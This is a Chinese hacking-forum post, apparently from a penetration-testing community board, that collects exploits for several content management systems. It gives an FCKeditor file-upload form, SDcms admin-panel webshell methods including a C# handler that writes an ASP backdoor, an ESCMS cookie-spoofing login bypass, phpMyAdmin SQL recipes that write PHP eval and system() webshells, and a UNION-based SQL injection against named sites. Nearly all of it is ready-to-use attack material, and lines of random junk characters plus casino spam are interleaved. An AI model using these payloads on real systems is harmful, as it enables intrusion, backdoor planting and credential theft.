2 o8 |' m' o4 E( p3 J4 \/ K
YxShop易想购物商城4.7.1版本任意文件上传漏洞
/ \: V$ L. o9 \1 _# O9 ]* S
' q; N- }7 F- n5 _7 d# u* @, n
http://xxoo.com/controls/fckedit
... aspx/connector.aspx
1 k. B/ `5 b! R6 t
跳转到网站根目录上传任意文件。
2 h( p7 S- B- ~3 H0 h6 R+ S
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
3 Z! R l$ K$ U6 s! D& ]7 c
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
, \" i5 |* k) e5 @
Upload a new file:<br>
& E- |5 S U; O' W
<input type="file" name="NewFile" size="50"><br>
f1 D8 L/ b& g8 S' E# D
<input id="btnUpload" type="submit" value="Upload">
7 u* w. ^$ _- V; L6 |) v
</form>
& I" [: s5 X( D. K8 D
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: u k6 k' A S, S
% I6 x% K- E& k
SDcms 后台拿webshell
: s2 G' D+ t+ p# ]
+ a& u( g. e3 K3 }- G! N
第一种方法:
5 S' b7 u+ d t' |
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
& S7 F7 L4 T3 ~) G5 I Z
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
j' R5 K3 G4 }" \" y6 {+ |/ q
用菜刀链接
http://www.xxx.com/inc/const.asp
就搞定了。
4 A8 P$ W1 f0 ~) U" v
第二种方法:
' P7 w* | a$ f8 }2 o8 b
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
4 A. p: B7 l/ h
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
8 o" e2 H4 n' C6 O! u
第三种方法:
/ I0 Z C. Q- _9 a" d- Z: {! q, l
进入后台-->界面管理-->模板文件管理-->创建文件
0 v) e# p% T: f1 w
文件名写入getshell.ashx
& P' r# S4 D2 X' W- }! s
内容写入下面内容:
+ s8 A# H+ ?3 e1 _" F; ?
/====================复制下面的=========================/
8 Y. j q4 Z! H6 _ }# I; s
<%@ WebHandler Language="C#" Class="Handler" %>
$ e4 I* }/ D# b$ K3 P
using System;
?( o5 F6 O0 a
using System.Web;
! |" T/ E! V$ h2 Q( F B( Z1 u5 D
using System.IO;
7 e3 E2 B& Q l g) P; x7 k
public class Handler : IHttpHandler {
/ q- ^/ g4 `/ |2 |5 S% n
public void ProcessRequest (HttpContext context) {
! B" Z) T& G% z4 V+ H& {
context.Response.ContentType = "text/plain";
: f+ r3 t+ y6 A4 v5 F$ k6 l* o
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
: |, M, v( X( a
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
* q/ ?0 A+ E" K+ ?5 A
file1.Flush();
: u. q$ p2 {* O9 q9 i
file1.Close();
, S7 n9 \3 l ], S) ~& m, ], L
}
' m) q2 e8 a: x. |0 A. O
public bool IsReusable {
: V. Z7 N# P2 Y
get {
: O$ D6 E& v+ L+ D! s
return false;
& x, t3 B( W' [& f' w
}
& G9 S: m! s! Y2 i1 {
}
. p2 M2 _+ h8 [
}
; \; \* N- E0 m! {( ^
/=============================================/
' X: Q t% {' ?7 ~
访问这个地址:
http://www.xxx.com/skins/2009/getshell.ashx
4 j4 U% g" S4 Q8 a8 Y5 L7 n; N
会在
http://www.xxx.com/skins/2009/
目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
1 s- J' ~+ R, L+ a1 F; G
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' a7 U5 v$ e* p" R7 H( l1 }
9 m8 P( \# G$ B
ESCMS网站管理系统0day
( p% e7 Y. [2 q* ?: c. z
7 a2 p' c9 V9 k
后台登陆验证是通过admin/check.asp实现的
9 K1 b% \" ^# y0 Q4 U4 g4 p
( V8 N+ t* x4 a
首先我们打开
http://target.com/admin/es_index.html
7 S; z8 K0 Z) o& c/ K& o
然后在COOKIE结尾加上
2 z* s3 c4 E5 u: P+ i
; ESCMS$_SP2=ES_admin=st0p;
; J+ I( S/ P7 i" E$ \3 e
修改,然后刷新
- E% G9 i- G' f! {
进后台了嘎..
2 F) V7 H8 y: h* D8 Y4 Z( f0 b
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
3 x0 E; F$ W( W* ?: O
/ s+ W) u3 ^- V7 p
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
* ]; S0 j" j9 A7 A; y$ {* G
嘿嘿,成功了,shell地址为
http://target.com/admin/diy.asp
$ `, m0 y: z6 M5 D9 P; l5 |3 \& n2 ]
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
3 P# Y% `& ~+ p
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
* y1 v. y8 }# P1 C, [2 H9 J
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 w I% Y3 ]; t$ Q( ~8 e+ b
0 [. e: _; g# V& a3 x% v7 |
宁志网站管理系统后台无验证漏洞及修复
$ C5 c7 l0 J' Z% ?
4 J; B& K2 x: o, F
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
9 M4 b, `3 A+ _2 ~
官方网站:
www.ningzhi.net
) o# p: z2 M7 |
学校网站管理系统 V.2011版本
( V" W8 {2 h3 q' G& ]9 u u) X& m0 q
http://down.chinaz.com/soft/29943.htm
8 M' i6 P. G* X) `# f" ]7 @: ?9 d) o' E
其它版本(如:政府版等),自行下载.
0 M" Z+ `* C4 H$ x- J
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
1 D" C8 w, T$ R' [
login.asp代码如下:
. ?9 f( j) V M( z
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
0 D0 z a" w2 A" A1 x
manage.asp代码我就不帖出来了.反正也没验证.
# S2 T" {6 G H* G; z% @, S
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
) A% _" Z+ d3 J9 i
漏洞利用:
, o( o- O; b i4 t6 ^1 `% L% U3 A
直接访问
http://www.0855.tv/admin/manage.asp
+ [" n# \) ^- t" k
数据库操作:
http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
2 b7 [# ]/ c. Q2 C
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. |2 _: [6 e% u& U( k: H: F
$ Q3 r6 r( N* F) X* R
phpmyadmin拿shell的四种方法总结及修复
0 h3 L* M* ^' y, ?- ^
7 }1 w9 R6 U7 r3 s* z
方法一:
) e8 s% ?4 p0 x8 v1 L
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
* B4 H. T; T' o: a) d) L( j$ w8 X
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
7 t6 A+ [- ^0 B0 I1 s6 V" M
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
# e0 \" y: R- N2 n6 s
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
- Z' p" `) W. O' z# V4 h* Z
一句话连接密码:7on
. H2 V3 L' f- C3 j! w$ _
方法二:
% c1 Y* x2 l, `% u9 |5 K
读取文件内容: select load_file('E:/xamp/www/s.php');
, K; ~9 v8 }* O: y. Z$ c
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
, f1 x2 }$ x5 o
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
7 ~1 i6 N" ^( o" r- L3 G5 t8 M7 {1 c
方法三:
/ n$ ~% h8 |! w4 i6 p5 X% ^2 U$ a
JhackJ版本 PHPmyadmin拿shell
$ D! o" }( x2 e# }! a1 W* H/ v- ]7 n/ b- H
Create TABLE study (cmd text NOT NULL);
! ^% v8 ^. c8 R4 I1 c9 f- o
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
" K) [0 c7 o! V q1 X/ d& C
select cmd from study into outfile 'E:/wamp/www/7.php';
/ \7 ~. j* Y% Q& c
Drop TABLE IF EXISTS study;
) G; o n8 I# u: l# `
<?php eval($_POST[cmd])?>
$ O' B, W( ?7 m l" Y
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
2 [! p) D$ d7 @6 a b
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
! a5 K5 E4 f# x" Q8 ?3 v0 v9 s+ U9 k
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
. f c: D8 ?8 L& B6 Z5 X
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
, _8 M5 R4 _2 C& b0 N
方法四:
" F) a1 B' ]* K" W7 f
select load_file('E:/xamp/www/study.php');
l v# [* v$ J4 ~0 `8 q' [
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
% l9 z; b- Q+ f* j: k* j
然后访问网站目录:
http://www.2cto.com/study.php?cmd=dir
% W* [' E9 b$ Z+ R, f8 f* l" ~
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
, g& g1 \, y# Y: x, H( n( n+ g
. T' e3 m: y7 D( H7 ]/ L
NO.001中学网站管理系统 Build 110628 注入漏洞
! W4 @& o3 G' }
+ U; A% _( B3 Y' A$ ]' ~! |4 e8 }
NO.001中学网站管理系统功能模块:
, O8 o9 n$ A+ ~" y8 f
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
: h5 S6 k+ T- s9 p" Y: _
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
; w7 M; o8 V1 l) X* J
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
, x2 l4 F1 m0 c7 C& v8 \/ u
4.视频图片管理:一级分类,动态添加视频或者图片等信息
3 l* J+ K+ C0 Z
5.留言管理:对留言,修改,删除、回复等管理
) }/ W. |& r+ s ?( I
6.校友频道:包括校友资料excel导出、管理等功能
F/ n3 [0 c: V, e
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
) F+ g* k/ w# I/ H8 O- f/ } V
默认后台:admin/login.asp
) m* r: S3 r3 k3 P- ^! s+ i) ?
官方演示:
http://demo.001cms.net
9 B$ g# x2 x% J4 w% y
源码下载地址:
http://down.chinaz.com/soft/30187.htm
2 }2 u6 H, O" j9 \
EXP:
. _9 {& Y* @6 S, G7 y
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
- h2 B* [' U" l# V% @5 F c" p
测试:
http://demo.001cms.net/shownews.asp?type=
新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
: p, P) w4 f% q7 i
getshell:后台有备份,你懂的
! z* i# D2 I: |
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
/ L2 I5 ~9 m, ?2 J5 t. [2 l
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
作者:
匿名
时间:
2017-10-28 08:21
casino slots
online casino canada
new online casino
slot machines
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2